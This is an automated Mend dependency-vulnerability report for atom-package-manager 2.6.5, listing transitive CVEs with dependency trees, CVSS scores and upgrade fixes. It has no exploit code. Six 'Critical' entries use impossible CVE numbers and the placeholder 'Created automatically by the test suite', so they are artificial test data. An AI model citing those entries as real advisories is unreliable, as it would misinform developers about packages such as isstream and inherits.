atom-package-manager-2.6.5.tgz: 21 vulnerabilities (highest severity is: 9.8)

[dev-mend-for-github-com]

Vulnerable Library - atom-package-manager-2.6.5.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /package.json,/apm/package.json

Vulnerabilities

Vulnerability	Severity	CVSS	Dependency	Type	Fixed in (atom-package-manager version)	Remediation Possible**	Reachability
CVE-88990-306783	Critical	9.8	request-2.88.0.tgz	Transitive	N/A*	❌
CVE-814504-1548	Critical	9.8	isstream-0.1.2.tgz	Transitive	N/A*	❌
CVE-72435-185255	Critical	9.8	tweetnacl-0.14.5.tgz	Transitive	N/A*	❌
CVE-495493-603164	Critical	9.8	delegates-1.0.0.tgz	Transitive	N/A*	❌
CVE-295712-399081	Critical	9.8	asn1-0.2.6.tgz	Transitive	N/A*	❌
CVE-289561-266276	Critical	9.8	inherits-2.0.4.tgz	Transitive	N/A*	❌
CVE-2022-37616	Critical	9.8	xmldom-0.1.31.tgz	Transitive	N/A*	❌
CVE-2025-7783	High	8.7	detected in multiple dependencies	Transitive	N/A*	❌
WS-2018-0625	High	7.5	xmlbuilder-0.4.3.tgz	Transitive	N/A*	❌
CVE-2025-59343	High	7.5	tar-fs-2.1.1.tgz	Transitive	N/A*	❌
CVE-2022-38900	High	7.5	decode-uri-component-0.2.0.tgz	Transitive	N/A*	❌
CVE-2022-29244	High	7.5	npm-6.14.17.tgz	Transitive	N/A*	❌
CVE-2021-3807	High	7.5	detected in multiple dependencies	Transitive	N/A*	❌
CVE-2021-32796	Medium	6.5	xmldom-0.1.31.tgz	Transitive	N/A*	❌
CVE-2023-28155	Medium	6.1	detected in multiple dependencies	Transitive	N/A*	❌
GHSA-g2q5-5433-rhrf	Medium	5.5	rc-1.2.8.tgz	Transitive	N/A*	❌
CVE-2022-33987	Medium	5.3	got-6.7.1.tgz	Transitive	N/A*	❌
CVE-2022-25881	Medium	5.3	http-cache-semantics-3.8.1.tgz	Transitive	N/A*	❌
CVE-2021-21366	Medium	4.3	xmldom-0.1.31.tgz	Transitive	N/A*	❌
CVE-2025-5889	Low	3.1	brace-expansion-1.1.11.tgz	Transitive	N/A*	❌
CVE-2025-54798	Low	2.5	tmp-0.0.28.tgz	Transitive	N/A*	❌

*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.

**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation

Details

CVE-88990-306783

Vulnerable Library - request-2.88.0.tgz

Simplified HTTP request client.

Library home page: https://registry.npmjs.org/request/-/request-2.88.0.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • ❌ request-2.88.0.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-88990-306783

CVSS 3 Score Details (9.8)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-814504-1548

Vulnerable Library - isstream-0.1.2.tgz

Determine if an object is a Stream

Library home page: https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz

Path to dependency file: /script/vsts/package.json

Path to vulnerable library: /script/vsts/package.json,/package.json,/script/package.json,/apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • request-2.88.2.tgz
    • ❌ isstream-0.1.2.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-814504-1548

CVSS 3 Score Details (9.8)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-72435-185255

Vulnerable Library - tweetnacl-0.14.5.tgz

Port of TweetNaCl cryptographic library to JavaScript

Library home page: https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz

Path to dependency file: /package.json

Path to vulnerable library: /package.json,/script/vsts/package.json,/script/package.json,/apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • request-2.88.2.tgz
    • http-signature-1.2.0.tgz
      • sshpk-1.17.0.tgz
        • ❌ tweetnacl-0.14.5.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-72435-185255

CVSS 3 Score Details (9.8)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-495493-603164

Vulnerable Library - delegates-1.0.0.tgz

delegate methods and accessors to another property

Library home page: https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/script/package.json,/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • npmlog-4.1.2.tgz
      • are-we-there-yet-1.1.4.tgz
        • ❌ delegates-1.0.0.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-495493-603164

CVSS 3 Score Details (9.8)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-295712-399081

Vulnerable Library - asn1-0.2.6.tgz

Contains parsers and serializers for ASN.1 (currently BER only)

Library home page: https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • request-2.88.2.tgz
    • http-signature-1.2.0.tgz
      • sshpk-1.17.0.tgz
        • ❌ asn1-0.2.6.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-295712-399081

CVSS 3 Score Details (9.8)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-289561-266276

Vulnerable Library - inherits-2.0.4.tgz

Browser-friendly inheritance fully compatible with standard node.js inherits()

Library home page: https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz

Path to dependency file: /packages/dev-live-reload/package.json

Path to vulnerable library: /packages/dev-live-reload/node_modules/inherits/package.json,/package.json,/packages/exception-reporting/node_modules/inherits/package.json,/apm/package.json,/packages/deprecation-cop/node_modules/inherits/package.json,/packages/git-diff/node_modules/inherits/package.json,/script/update-server/package.json,/script/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • asar-require-0.3.0.tgz
    • asar-0.12.1.tgz
      • glob-6.0.4.tgz
        • ❌ inherits-2.0.4.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-289561-266276

CVSS 3 Score Details (9.8)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-2022-37616

Vulnerable Library - xmldom-0.1.31.tgz

A W3C Standard XML DOM(Level2 CORE) implementation and parser(DOMParser/XMLSerializer).

Library home page: https://registry.npmjs.org/xmldom/-/xmldom-0.1.31.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • plist-0.4.4.tgz
    • ❌ xmldom-0.1.31.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package before 0.8.3 for Node.js via the p variable. NOTE: the vendor states "we are in the process of marking this report as invalid"; however, some third parties takes the position that "A prototype injection/Prototype pollution is not just when global objects are polluted with recursive merge or deep cloning but also when a target object is polluted."
Mend Note:

Publish Date: 2022-10-11

URL: CVE-2022-37616

CVSS 3 Score Details (9.8)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-9pgh-qqpf-7wqj

Release Date: 2022-10-11

Fix Resolution: @xmldom/xmldom - 0.7.6,@xmldom/xmldom - 0.9.0-beta.2,@xmldom/xmldom - 0.8.3

CVE-2025-7783

Vulnerable Libraries - form-data-2.3.2.tgz, form-data-2.3.3.tgz

form-data-2.3.2.tgz

A library to create readable "multipart/form-data" streams. Can be used to submit forms and file uploads to other web applications.

Library home page: https://registry.npmjs.org/form-data/-/form-data-2.3.2.tgz

Path to dependency file: /script/vsts/package.json

Path to vulnerable library: /script/vsts/package.json,/apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • request-2.88.0.tgz
      • ❌ form-data-2.3.2.tgz (Vulnerable Library)

form-data-2.3.3.tgz

A library to create readable "multipart/form-data" streams. Can be used to submit forms and file uploads to other web applications.

Library home page: https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/package.json,/script/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • request-2.88.2.tgz
    • ❌ form-data-2.3.3.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Summary form-data uses "Math.random()" to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker: 1. can observe other values produced by Math.random in the target application, and 2. can control one field of a request made using form-data Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request. This is largely the same vulnerability as was "recently found in "undici"" (https://hackerone.com/reports/2913312) by ""parrot409"" (https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work. Details The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347 An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a "x-request-id" header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. "Math.random()" is a fine place to get these sorts of IDs (in fact, "opentelemetry uses Math.random for this purpose" (https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22)) PoC PoC here: https://github.com/benweissmann/CVE-2025-7783-poc Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID). Impact For an application to be vulnerable, it must: - Use "form-data" to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array) - Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values. If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.

Publish Date: 2025-07-21

URL: CVE-2025-7783

CVSS 3 Score Details (8.7)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: None
  • Scope: Changed
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: None

For more information on CVSS3 Scores, click here.

WS-2018-0625

Vulnerable Library - xmlbuilder-0.4.3.tgz

An XML builder for node.js

Library home page: https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-0.4.3.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • plist-0.4.4.tgz
    • ❌ xmlbuilder-0.4.3.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

The package xmlbuilder-js before 9.0.5 is vulnerable to denial of service due to a regular expression issue.

Publish Date: 2018-02-08

URL: WS-2018-0625

CVSS 3 Score Details (7.5)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: None
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2018-02-08

Fix Resolution: 9.0.5

CVE-2025-59343

Vulnerable Library - tar-fs-2.1.1.tgz

filesystem bindings for tar-stream

Library home page: https://registry.npmjs.org/tar-fs/-/tar-fs-2.1.1.tgz

Path to dependency file: /package.json

Path to vulnerable library: /package.json,/apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • keytar-7.9.0.tgz
    • prebuild-install-7.1.1.tgz
      • ❌ tar-fs-2.1.1.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Impact v3.1.0, v2.1.3, v1.16.5 and below Patches Has been patched in 3.1.1, 2.1.4, and 1.16.6 Workarounds You can use the ignore option to ignore non files/directories. ignore (_, header) { // pass files & directories, ignore e.g. symlinks return header.type !== 'file' && header.type !== 'directory' } Credit Reported by: Mapta / BugBunny_ai

Publish Date: 2025-09-24

URL: CVE-2025-59343

CVSS 3 Score Details (7.5)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: High
  • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-vj76-c3g6-qr5v

Release Date: 2025-09-24

Fix Resolution: tar-fs - 3.1.1,tar-fs - 1.16.5,tar-fs - 2.1.3

CVE-2022-38900

Vulnerable Library - decode-uri-component-0.2.0.tgz

A better decodeURIComponent

Library home page: https://registry.npmjs.org/decode-uri-component/-/decode-uri-component-0.2.0.tgz

Path to dependency file: /script/package.json

Path to vulnerable library: /script/package.json,/apm/package.json,/script/vsts/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • query-string-6.8.2.tgz
      • ❌ decode-uri-component-0.2.0.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

decode-uri-component 0.2.0 is vulnerable to Improper Input Validation resulting in DoS.
Mend Note:

Publish Date: 2022-11-28

URL: CVE-2022-38900

CVSS 3 Score Details (7.5)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: None
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-w573-4hg7-7wgq

Release Date: 2022-11-28

Fix Resolution: decode-uri-component - 0.2.1

CVE-2022-29244

Vulnerable Library - npm-6.14.17.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-6.14.17.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • ❌ npm-6.14.17.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

npm pack ignores root-level .gitignore and .npmignore file exclusion directives when run in a workspace or with a workspace flag (ie. "--workspaces", "--workspace="). Anyone who has run "npm pack" or "npm publish" inside a workspace, as of v7.9.0 and v7.13.0 respectively, may be affected and have published files into the npm registry they did not intend to include. Users should upgrade to the latest, patched version of npm v8.11.0, run: npm i -g npm@latest . Node.js versions v16.15.1, v17.19.1, and v18.3.0 include the patched v8.11.0 version of npm.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: 2022-06-13

URL: CVE-2022-29244

CVSS 3 Score Details (7.5)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: None
  • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-hj9c-8jmm-8c52

Release Date: 2022-06-13

Fix Resolution: npm - 8.11.0

CVE-2021-3807

Vulnerable Libraries - ansi-regex-4.1.0.tgz, ansi-regex-3.0.0.tgz

ansi-regex-4.1.0.tgz

Regular expression for matching ANSI escape codes

Library home page: https://registry.npmjs.org/ansi-regex/-/ansi-regex-4.1.0.tgz

Path to dependency file: /script/package.json

Path to vulnerable library: /script/package.json,/apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • libnpx-10.2.4.tgz
      • yargs-14.2.3.tgz
        • string-width-3.1.0.tgz
          • strip-ansi-5.2.0.tgz
            • ❌ ansi-regex-4.1.0.tgz (Vulnerable Library)

ansi-regex-3.0.0.tgz

Regular expression for matching ANSI escape codes

Library home page: https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /package.json,/apm/package.json,/script/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • cli-columns-3.1.2.tgz
      • string-width-2.1.1.tgz
        • strip-ansi-4.0.0.tgz
          • ❌ ansi-regex-3.0.0.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

ansi-regex is vulnerable to Inefficient Regular Expression Complexity
Mend Note:

Publish Date: 2021-09-17

URL: CVE-2021-3807

CVSS 3 Score Details (7.5)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: None
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-93q8-gq69-wqmw

Release Date: 2021-09-17

Fix Resolution: ansi-regex - 5.0.1,ansi-regex - 4.1.1,ansi-regex - 6.0.1,ansi-regex - 3.0.1

CVE-2021-32796

Vulnerable Library - xmldom-0.1.31.tgz

A W3C Standard XML DOM(Level2 CORE) implementation and parser(DOMParser/XMLSerializer).

Library home page: https://registry.npmjs.org/xmldom/-/xmldom-0.1.31.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • plist-0.4.4.tgz
    • ❌ xmldom-0.1.31.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

xmldom is an open source pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications. This issue has been resolved in version 0.7.0. As a workaround downstream applications can validate the input and reject the maliciously crafted documents.
Mend Note:

Publish Date: 2021-07-27

URL: CVE-2021-32796

CVSS 3 Score Details (6.5)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: Low
  • Integrity Impact: Low
  • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-5fg8-2547-mr8q

Release Date: 2021-07-27

Fix Resolution: @xmldom/xmldom - 0.7.0

CVE-2023-28155

Vulnerable Libraries - request-2.88.0.tgz, request-2.88.2.tgz

request-2.88.0.tgz

Simplified HTTP request client.

Library home page: https://registry.npmjs.org/request/-/request-2.88.0.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • ❌ request-2.88.0.tgz (Vulnerable Library)

request-2.88.2.tgz

Simplified HTTP request client.

Library home page: https://registry.npmjs.org/request/-/request-2.88.2.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • ❌ request-2.88.2.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

The Request package through 2.88.1 for Node.js allows a bypass of SSRF mitigations via an attacker-controller server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Mend Note:

Publish Date: 2023-03-16

URL: CVE-2023-28155

CVSS 3 Score Details (6.1)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Changed
• Impact Metrics:
  • Confidentiality Impact: Low
  • Integrity Impact: Low
  • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-p8p7-x288-28g6

Release Date: 2023-03-16

Fix Resolution: @cypress/request - 3.0.0

GHSA-g2q5-5433-rhrf

Vulnerable Library - rc-1.2.8.tgz

hardwired configuration loader

Library home page: https://registry.npmjs.org/rc/-/rc-1.2.8.tgz

Path to dependency file: /script/package.json

Path to vulnerable library: /script/package.json,/package.json,/apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • update-notifier-2.5.0.tgz
      • latest-version-3.1.0.tgz
        • package-json-4.0.1.tgz
          • registry-auth-token-3.4.0.tgz
            • ❌ rc-1.2.8.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

The npm package "rc" had versions published with malicious code. Users of affected versions (1.2.9, 1.3.9, and 2.3.9) should downgrade to 1.2.8 as soon as possible and check their systems for suspicious activity. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Publish Date: 2025-07-14

URL: GHSA-g2q5-5433-rhrf

CVSS 3 Score Details (5.5)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Local
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: None
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-2022-33987

Vulnerable Library - got-6.7.1.tgz

Simplified HTTP requests

Library home page: https://registry.npmjs.org/got/-/got-6.7.1.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • update-notifier-2.5.0.tgz
      • latest-version-3.1.0.tgz
        • package-json-4.0.1.tgz
          • ❌ got-6.7.1.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

The got package before 12.1.0 (also fixed in 11.8.5) for Node.js allows a redirect to a UNIX socket.

Publish Date: 2022-06-18

URL: CVE-2022-33987

CVSS 3 Score Details (5.3)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: Low
  • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-pfrx-2q88-qq97

Release Date: 2022-06-18

Fix Resolution: got - 12.1.0,got - 11.8.5

CVE-2022-25881

Vulnerable Library - http-cache-semantics-3.8.1.tgz

Parses Cache-Control and other headers. Helps building correct HTTP caches and proxies

Library home page: https://registry.npmjs.org/http-cache-semantics/-/http-cache-semantics-3.8.1.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/script/vsts/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • npm-6.14.17.tgz
    • npm-registry-fetch-4.0.7.tgz
      • make-fetch-happen-5.0.2.tgz
        • ❌ http-cache-semantics-3.8.1.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.

Publish Date: 2023-01-31

URL: CVE-2022-25881

CVSS 3 Score Details (5.3)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: None
  • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-rc47-6667-2j5j

Release Date: 2023-01-31

Fix Resolution: org.webjars.npm:http-cache-semantics:4.1.1,http-cache-semantics - 4.1.1

CVE-2021-21366

Vulnerable Library - xmldom-0.1.31.tgz

A W3C Standard XML DOM(Level2 CORE) implementation and parser(DOMParser/XMLSerializer).

Library home page: https://registry.npmjs.org/xmldom/-/xmldom-0.1.31.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • plist-0.4.4.tgz
    • ❌ xmldom-0.1.31.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. xmldom versions 0.4.0 and older do not correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents. This may lead to unexpected syntactic changes during XML processing in some downstream applications. This is fixed in version 0.5.0. As a workaround downstream applications can validate the input and reject the maliciously crafted documents.

Publish Date: 2021-03-12

URL: CVE-2021-21366

CVSS 3 Score Details (4.3)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: None
  • Integrity Impact: Low
  • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-h6q6-9hqw-rwfv

Release Date: 2021-03-12

Fix Resolution: xmldom - 0.5.0

CVE-2025-5889

Vulnerable Library - brace-expansion-1.1.11.tgz

Brace expansion as known from sh/bash

Library home page: https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz

Path to dependency file: /script/package.json

Path to vulnerable library: /script/package.json,/script/vsts/package.json,/apm/package.json,/package.json

Dependency Hierarchy:

• atom-package-manager-2.6.5.tgz (Root Library)
  • glob-7.2.3.tgz
    • minimatch-3.1.2.tgz
      • ❌ brace-expansion-1.1.11.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. Affected by this issue is the function expand of the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 and 4.0.1 is able to address this issue. The name of the patch is "a5b98a4f30d7813266b221435e1eaaf25a1b0ac5". It is recommended to upgrade the affected component.

Publish Date: 2025-07-14

URL: CVE-2025-5889

CVSS 3 Score Details (3.1)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: High
  • Privileges Required: Low
  • User Interaction: None
